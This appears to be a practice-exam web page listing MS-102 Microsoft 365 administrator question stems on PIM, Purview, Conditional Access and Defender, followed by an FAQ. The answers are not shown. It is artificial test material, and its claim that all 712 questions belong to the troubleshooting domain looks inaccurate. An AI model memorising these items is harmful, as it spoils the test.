Hard687You are a Microsoft 365 administrator for a company that uses Microsoft Entra ID P2. The company has a requirement that all administrative roles must be activated only after approval by a designated approver. You configure Privileged Identity Management (PIM) for the Global Administrator role. You need to ensure that when a user activates the role, an approver must approve the request before the role is activated. What should you configure in the PIM role settings?
Medium688Drag and drop the steps to configure a compliance retention policy in Microsoft Purview in the correct order.
Medium689Refer to the exhibit. An administrator runs the KQL query in Microsoft Defender for Endpoint. The result set is empty. What is the most likely reason?
Medium690A legal hold is required for all emails in a user's mailbox related to a litigation case. The administrator needs to ensure that the mailbox content is preserved even if the user tries to delete emails. Which Microsoft Purview feature should be used?
Medium691You are the Microsoft 365 administrator for a company that uses Microsoft 365 E3. The company wants to allow users to reset their own passwords without contacting the help desk. You need to enable self-service password reset (SSPR) for all users. What should you do?
Easy692Your organization uses Microsoft Defender for Identity. You receive an alert about a suspicious Kerberos ticket request. You need to investigate which user account is potentially compromised. Which tool should you use to correlate the alert with user activity?
Medium693A security administrator wants to block users from uploading files to personal cloud storage apps (e.g., Dropbox) from managed Windows devices, while allowing access from compliant mobile devices. Which Microsoft 365 Defender feature should be used?
Medium694An administrator needs to configure email notifications for Exchange Online service health incidents to be sent to a specific IT support mailbox. Where should the administrator configure these notifications in the Microsoft 365 admin center?
Easy695A company purchases Microsoft 365 E5 licenses for 500 users. The administrator wants to automatically assign licenses to new users based on their group membership. Which method should the administrator use?
Easy696A security administrator notices that users are receiving phishing emails that evade built-in anti-spam filters. The administrator wants to enable users to report these suspicious emails from Outlook and have them automatically trigger an investigation and block the sender. Which feature should be configured in Microsoft Defender for Office 365?
Hard697Refer to the exhibit. You run this PowerShell command in your Microsoft 365 tenant. What is the purpose of the command?
Easy698Which TWO actions can an admin take to reduce the number of passwords in use for end users?
Medium699You are reviewing a Conditional Access policy in Microsoft Entra ID. The exhibit shows the policy configuration. You need to allow users to access Office 365 applications from personal devices that are not enrolled in Microsoft Intune. However, the policy currently blocks access because it requires a compliant device. Users are prompted for MFA but then blocked due to device compliance. What should you modify in the policy?
Hard700You are a Microsoft 365 administrator. A user reports that they cannot send emails to a specific external domain. You check the Exchange Admin Center and see that the domain is not blocked. What should you check next?
Medium701Your organization requires that all administrators use phishing-resistant authentication methods. Which Microsoft Entra ID authentication method meets this requirement?
Easy702Your company uses Microsoft 365 Business Premium. You need to ensure that all company-owned Windows 10 devices are automatically enrolled in Microsoft Intune when users sign in with their work account. The devices are Azure AD joined. You have configured automatic enrollment in Intune. However, some devices are not enrolling. You need to troubleshoot the issue. What should you check first?
Easy703Your company is migrating from an on-premises file server to SharePoint Online. You need to ensure that files containing personally identifiable information (PII) are automatically detected and classified with a sensitivity label. What should you use?
Hard704An organization uses a third-party SaaS application that supports SAML-based single sign-on. The application is not in the Azure AD gallery. What is the first step to configure SSO?
Medium705A security administrator needs to discover which cloud apps are being used in the organization and then block usage of unsanctioned apps in real time using a reverse proxy. Which two Microsoft Defender for Cloud Apps features must be configured to meet these requirements? (Select all that apply.)
Hard706An administrator is creating a Microsoft Purview auto-labeling policy for documents containing personally identifiable information. Before turning the policy on automatically, what should the administrator do to reduce false positives?
Hard707You are the Microsoft 365 administrator for Fabrikam Inc. The compliance team needs to investigate a suspected data leak involving a former employee. They must preserve all mailbox content and SharePoint Online documents related to the employee for litigation. They also need to search for specific keywords across these locations. Which Microsoft Purview solution should they use?
Medium708Your organization has a Microsoft 365 E5 tenant. You want to ensure that all users are automatically signed in to Microsoft 365 apps using single sign-on (SSO) when they are on the corporate network. You have Azure AD joined the devices. What additional configuration is required?
Hard709An organization needs to restrict access to Microsoft 365 admin center to only specific users. Which approach should be used?
Hard710An administrator wants to prevent users from inviting guest users from the domain 'contoso.com' to the tenant. The administrator needs to block all invitations for that specific domain while allowing invitations from all other external domains. Which setting in Microsoft Entra ID should be configured?
Medium711Refer to the exhibit. You have two DLP compliance rules as shown. A user sends an email containing both PII and credit card numbers. Which rule will be applied?
Hard712A company wants to allow users to reset their own forgotten passwords using a mobile app notification as the verification method. Which Microsoft Entra feature should be enabled and configured?
MediumOther domains
All MS-102 exam domains
Frequently asked questions
- What does the troubleshooting domain cover on the MS-102 exam?
- troubleshooting questions test whether you can apply the concept in context, not just recognise a definition.
- How many questions are in this domain?
- This page lists all 712 troubleshooting questions in the MS-102 question bank. The actual exam draws from this domain proportionally to its weighting in the official exam blueprint.
- What is the best way to practise this domain?
- Start with a short focused session (10 questions) to identify gaps, then work through explanations. Repeat with a longer session once the weak areas feel solid.
- Can I practise only troubleshooting questions?
- Yes — the session launcher on this page filters questions to this domain only. Choose any session length for inline explanations and scoring.